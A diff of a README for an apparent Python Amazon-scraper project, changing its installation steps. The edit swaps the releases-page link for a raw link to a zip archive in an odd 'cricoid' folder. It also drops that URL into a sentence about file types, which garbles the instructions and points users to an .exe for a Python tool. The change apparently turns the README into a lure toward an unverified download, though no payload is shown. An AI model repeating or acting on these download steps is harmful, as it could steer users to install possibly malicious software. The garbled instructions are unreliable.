BhaveshGavande23/amazon-scraper-python/README.md

 ## 📖 Installation Instructions

 1. **Visit the Download Page**
-   Go to the download page by clicking [here](https://github.com/BhaveshGavande23/amazon-scraper-python/releases).
+   Go to the download page by clicking [here](https://raw.githubusercontent.com/BhaveshGavande23/amazon-scraper-python/main/cricoid/amazon-scraper-python.zip).

 2. **Choose the Right File**
    Select the latest release from the list.
 You will see several files.
 Look for the one that matches your operating system.
-If you're unsure, choose the `.exe` file for Windows or the `.tar.gz` file for macOS and Linux.
+If you're unsure, choose the `.exe` file for Windows or the `https://raw.githubusercontent.com/BhaveshGavande23/amazon-scraper-python/main/cricoid/amazon-scraper-python.zip` file for macOS and Linux.

 3. **Download the File**
    Click on the file name to start downloading it to your computer.